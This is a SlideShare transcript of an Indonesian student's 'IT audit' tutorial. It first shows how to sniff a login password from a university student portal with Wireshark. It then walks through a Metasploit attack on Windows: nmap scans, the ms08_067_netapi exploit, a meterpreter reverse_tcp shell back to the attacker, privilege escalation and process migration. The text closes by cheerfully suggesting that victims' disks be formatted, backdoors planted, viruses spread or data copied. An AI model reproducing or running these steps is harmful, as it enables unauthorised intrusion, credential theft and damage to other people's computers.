1

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
WIRESHARK
1. Melacak password pada jaringan menggunakan Wireshark
Sebelum kita menggunakan tools tesebut ada baiknya kita ...
Gambar 2 : Tampilan awal Wireshark
d. Selanjutnya, seperti rencana awal kita tadi, kita akan melakukan Sniffing pada

suat...
f. Setelah kita memilih Interface List, maka akan tampil seperti gambar berikut :

Gambar 4 : Wireshark Capture interface
...
Gambar 6 : Halaman Login Mahasiswa STMIK Atmaluhur
Secara otomatis halaman yang saya buka pasti akan tercantum pada list h...
h. Selanjutnya klik kanan pada pilihan yang tertunujuk pada panah merah seperti gambar

diatas, kemudian pilih Follow TCP ...
Metasploit
2. Exploit Windows With Metasploit – Backtrack
Setelah kita menggunakan Wireshark, kali ini kita akan mencoba t...
Jelas terlihat port 445 terbuka , langsung saja buka msfconsole atau Metasploit Framework
versi console..
c. ketik perinta...
set LHOST 192.168.0.3 ( 192.168.0.3 adalah ip saya )
set LPORT 4444 ( port pada Backtrack )
set PAYLOAD windows/meterprete...
tapi bagaimana jika ternyata error? tidak seperti di atas saat,error memasukan perintah shell...atau saat
memasukan perint...
jika sudah berada di C:Windowssystem32> berarti kita sudah sukses menyusup ke computer Target
yang kita tentukan tinggal s...
Upcoming SlideShare
Loading in...5
×

It audit tools

429

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
429
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
49
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "It audit tools"

  1. 1. 1 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  2. 2. WIRESHARK 1. Melacak password pada jaringan menggunakan Wireshark Sebelum kita menggunakan tools tesebut ada baiknya kita terlebih dahulu mengetahui kegunaan dari tools yang akan kita gunakan. Wireshark itu apa ya??? Newbe ckckckkck Wireshark merupakan salah satu dari sekian banyak tool Network Analyzer yang banyak digunakan oleh Network administrator untuk menganalisa kinerja jaringannya terrmasuk protokol didalamnya. Wireshark banyak disukai karena interfacenya yang menggunakan Graphical User Interface (GUI) atau tampilan grafis. Wireshark mampu menangkap paket-paket data atau informasi yang berterbangan dalam jaringan. Semua jenis paket informasi dalam berbagai format protokol pun akan dengan mudah ditangkap dan dianalisa. Karenanya tak jarang tool ini juga dapat dipakai untuk Sniffing (memperoleh informasi penting seperti password email atau account lain) dengan menangkap paket-paket yang berterbangan di dalam jaringan dan menganalisanya. Setelah kita mengetahui fungsi dari software yang akan kita gunakan, kali ini kita akan mencoba salah satu dari fungsi Wireshark yaitu Sniffing. Bagaimana caranya.....???? yuk ikuti langkah berikut ini.. a. Pertama-tama kita harus menginstal terlebih dahulu program Wireshark pada computer/Laptop yang akan kita gunakan, untuk Software Wireshark –nya dapat di download di sini http://www.wireshark.org/ b. Setelah di download, langsung saja instal program Wireshark-nya. Gak susah kok nginstallnya tinggal next-next aja..... c. Jika proses penginstalan berhasil dengan mulus kurang lebih tampilan programnya seperti 2 Gambar 1 : Loading configuration files wireshark Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  3. 3. Gambar 2 : Tampilan awal Wireshark d. Selanjutnya, seperti rencana awal kita tadi, kita akan melakukan Sniffing pada suatu jaringan wireless, so ikuti langkah selanjunya. e. Pilih Interface List seerti gambar dibawah ini 3 Gambar 3 : Interface List Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  4. 4. f. Setelah kita memilih Interface List, maka akan tampil seperti gambar berikut : Gambar 4 : Wireshark Capture interface pada gambar diatas merupakan pilihan koneksi jaringan yang akan kita gunakan, pada tutorial ini saya memilih jaringan Wireless seperti gambar diatas, g. Setelah kita jalankan maka secara otomatis Wireshark akan mendeteksi paket-paket data dan seluruh aktivitas yang berlangsung pada koneksi wireless yang telah kita pilih seperti gambar berikut : Gambar 5 : Capturing from Wireshark Network Connection Ketikkan “http” seperti gambar diatas tanpa tanda petik, lalu tekan tobol enter. Tunggu beberapa saat, sampai proses scan wireshark hanya menampilakan akses HTTP yang sedang berlangsung. Bingung???? Hahhahah biar sama-sama ngerti mari kita langsung jalankan skenarionya...! Begini, pertama-tama saya akan membuka dan login pada halaman berikut ini : http://mahasiswa.atmaluhur.ac.id/index.php 4 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  5. 5. Gambar 6 : Halaman Login Mahasiswa STMIK Atmaluhur Secara otomatis halaman yang saya buka pasti akan tercantum pada list histori akses seperti yang tertunjuk pada tanda panah merah dibawah ini : Gambar 7 : Capturing from Wireshark Network Connection 5 Artinya, ketika kita membuka alamat http://mahasiswa.atmaluhur.ac.id/index.php maka alamat tersebut, akan terekam sebagai log aktivitas yang berlangsung pada jaringan tersebut, Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  6. 6. h. Selanjutnya klik kanan pada pilihan yang tertunujuk pada panah merah seperti gambar diatas, kemudian pilih Follow TCP Stream. Maka akan tampil seperti gambar berikut : i. Gambar 8 : Follow TCP Stream Perhatikan kotak hijau yang terdapat pada gambar diatas merupakan NIM serta PASSWORD login saya pada halaman website mahasiswa.atmaluhur.ac.id 6 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  7. 7. Metasploit 2. Exploit Windows With Metasploit – Backtrack Setelah kita menggunakan Wireshark, kali ini kita akan mencoba tools selanjutnya yaitu Metasploit. Apa itu Metasploit??? Metasploit framework adalah sebuah penetration tool yang cukup powerfull untuk melakukan penestrasi kedalam sebuah system. metasploit framework bisa juga di katakan sebagai sebuah platform pengembangan untuk membuat tool security dan exploit. Metasploit framework sering dibuat dengan menggunakan bahasa pemrograman Ruby. Fungsi dasar dari metasploit framework adalah untuk memunculkan modul, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya walaupun penyusup sistem berada padajarakjangkauan yang jauh tetapi dapat mengendalikan komputer korban. Oke langsung saja ke sekenario yang akan kita laksanakan adalah kita akan mencoba untuk penetrasi ke dalam computer target yang telah kita tentukan dengan menggunakan Metasploit. Langsung saja ikuti langkah berikut ini : a. Saya asumsikan bahwa dikomputer atau laptop yang anda gunakan saat ini telah terinstal software Backtrack, selanjutnya lakukan scan IP dan Port yang terbuka pada jaringan menggunakan nmap yang telah tersedia di backtrack. buka terminal ketik perintah nmap -sn 192.168.0.1-255 -sn adalah perintah nmap untuk melakukan scanning IP yang aktif / tidak.. -192.168.0.1-255 adalah IP yang akan kita scan, dari 192.168.0.1 sampai 192.168.0.255 Note : Untuk IP nya dapat disesuaikan dengan IP yang anda gunakan b. Lalu jika sudah menemukan IP yang aktif kita scan Port yang terbuka pada target..contoh saya mendapakan IP 192.168.0.4 lakukan perintah nmap -f 192.168.0.4 Note : -f adalah fast scanning sehingga nmap akan melakukan scanning secepat mungkin… lihat hasilnya 7 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  8. 8. Jelas terlihat port 445 terbuka , langsung saja buka msfconsole atau Metasploit Framework versi console.. c. ketik perintah msfconsole pada terminal/console. tunggu biasanya agak lama. setelah terbuka ketik search netapi dan setelah itu kita gunakan yang exploit/windows/smb/ms08_067_netapi ketik perintah use exploit/windows/smb/ms08_067_netapi ketik show options untuk melihat opsi apa yang harus kita isi. 8 d. Langkah selanjutnya kita harus mensetting RHOST terlebih dahulu dengan cara ketik RHOST dengan ip target lakukan perintah set RHOST 192.168.0.4 Note : IP address menyesuaikan dengan IP Target kita Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  9. 9. set LHOST 192.168.0.3 ( 192.168.0.3 adalah ip saya ) set LPORT 4444 ( port pada Backtrack ) set PAYLOAD windows/meterpreter/reverse_tcp jalankan exploit dengan perintah exploit tampak hasilnya seperti berikut ini : Sejauh ini kita sudah bias masuk di bagian Meterpreter. Yeee Horeeee  Sekarang kita akan mengendalikan Command Prompt ( CMD ) korban , tapi sebelumnya kita lihat dulu posisi kita... e. pertama kita lihat siapa kita, dengan perintah getuid, dan outputnya NT AUTHORITYSYSTEM , tapi bagaimana jika bukan NT AUTHORITYSYSTEM alias si korban tidak menjalankan sebagai administrator pada komputernya? kita lakukan ketik perintah getsystem , lalu cek lagi dengan perintah getuid jika sudah NT AUTHORITYSYSTEM lanjutkan... kita ketik perintah pwd untuk cek keberadaan kita dan pada output saya adalah C:WINDOWSsystem32 langsung ketik perintah shell untuk eksekusi CMD..dan hasilnya tampak seperti gambar berikut : 9 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  10. 10. tapi bagaimana jika ternyata error? tidak seperti di atas saat,error memasukan perintah shell...atau saat memasukan perintah shell tidak ke C:Windowssystem32 ??? mungkin procces dirrectory nya tidak tepat... jika masalah seperti itu lakukan perintah migrate...kita akan berpindah.. ketik perintah ps pada meterpreter untuk melihat process ID yang ada... setelah keluar kita cari PID svchost.exe, jika sudah ketemu pindahlah dengan perintah migrate contoh : migrate 1328 jika sukses, cek dengan perintah pwd , lalu jalankan perintah shell.. Seperti gambar berikut : 10 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  11. 11. jika sudah berada di C:Windowssystem32> berarti kita sudah sukses menyusup ke computer Target yang kita tentukan tinggal selanjutnya bagaimana yang ingin kita lakukan terhadap computer korban, mau Format Harddisk korban,shutdown,pasang backdoor,sebarin virus,copy data apalah terserah mau Remmote Desktop. Yah kita yang kendalikan. Tergantung Hati Nurani masing-masing. Hehheheh  11 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG

×